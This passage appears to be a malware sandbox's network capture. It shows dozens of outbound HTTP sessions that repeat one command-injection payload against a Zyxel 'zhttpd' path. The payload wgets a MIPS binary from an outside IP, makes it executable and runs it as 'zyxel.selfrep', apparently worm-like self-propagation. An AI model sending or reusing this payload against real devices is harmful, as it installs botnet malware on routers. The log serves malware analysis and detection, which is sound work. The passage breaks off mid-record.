                                                        Jan 28, 2024 10:13:08.714754105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8434192.168.2.1460554175.219.94.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714776993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8435192.168.2.144315458.75.107.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714827061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8436192.168.2.1446846143.155.45.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714865923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8437192.168.2.1458666153.5.178.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714920044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8438192.168.2.145740695.4.131.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714961052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8439192.168.2.1454274135.76.102.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714998007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8440192.168.2.145520218.52.203.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715010881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8441192.168.2.1445172136.242.216.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715058088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8442192.168.2.1449410123.231.150.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715095043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8443192.168.2.144801884.48.2.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715142965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8444192.168.2.143854219.113.156.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715187073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8445192.168.2.145426424.15.193.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715214014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8446192.168.2.145879851.156.242.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715255976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8447192.168.2.145342647.12.177.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715289116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8448192.168.2.1451972191.109.191.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715323925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8449192.168.2.1436370191.43.255.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715361118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8450192.168.2.145828661.34.110.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715385914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8451192.168.2.143898037.11.212.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715439081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8452192.168.2.1446978175.173.43.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715471029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8453192.168.2.1444878119.38.8.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715512991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8454192.168.2.145145268.162.193.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715536118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8455192.168.2.1449686129.145.172.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715588093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8456192.168.2.1452240131.202.78.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715631008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8457192.168.2.143583253.187.229.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715660095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8458192.168.2.1453782154.188.185.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715699911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8459192.168.2.145212890.14.92.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715725899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8460192.168.2.1444712144.234.151.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715781927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8461192.168.2.1454568133.13.199.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715818882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8462192.168.2.1436862201.202.25.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715857029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8463192.168.2.143384046.165.35.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715898991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8464192.168.2.144948448.207.100.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715939045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8465192.168.2.1443316122.208.89.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.715991020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8466192.168.2.1451660196.10.162.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716036081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8467192.168.2.1452368160.57.120.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716063976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8468192.168.2.143415296.238.2.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716123104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8469192.168.2.1456008207.96.150.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716159105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8470192.168.2.145818253.90.89.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716198921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8471192.168.2.145369259.101.45.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716237068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8472192.168.2.145460046.85.154.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716273069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8473192.168.2.1460102107.111.167.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716308117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8474192.168.2.144895485.153.211.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716368914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8475192.168.2.1443476171.133.247.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716418028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8476192.168.2.143596866.20.73.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716438055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8477192.168.2.1434612204.50.31.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716490984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8478192.168.2.145840435.3.70.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716526031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8479192.168.2.1442324222.66.237.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716552019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8480192.168.2.1458554158.10.120.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716592073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8481192.168.2.145062220.183.217.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716634035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8482192.168.2.143820227.110.45.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716667891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8483192.168.2.1441484152.183.70.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716697931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8484192.168.2.1458058111.12.74.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716746092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8485192.168.2.1440166126.136.239.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716773033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8486192.168.2.145982691.68.19.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716811895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8487192.168.2.1439434166.96.135.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716850996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8488192.168.2.1460456139.40.26.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716893911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8489192.168.2.1460888138.104.233.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716919899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8490192.168.2.143450664.141.216.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.716959953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8491192.168.2.1460506188.52.60.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717008114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8492192.168.2.145714274.7.222.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717032909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8493192.168.2.1445308167.149.113.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717075109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8494192.168.2.1449706165.167.238.62443
                                                        TimestampBytes transferredDirectionData
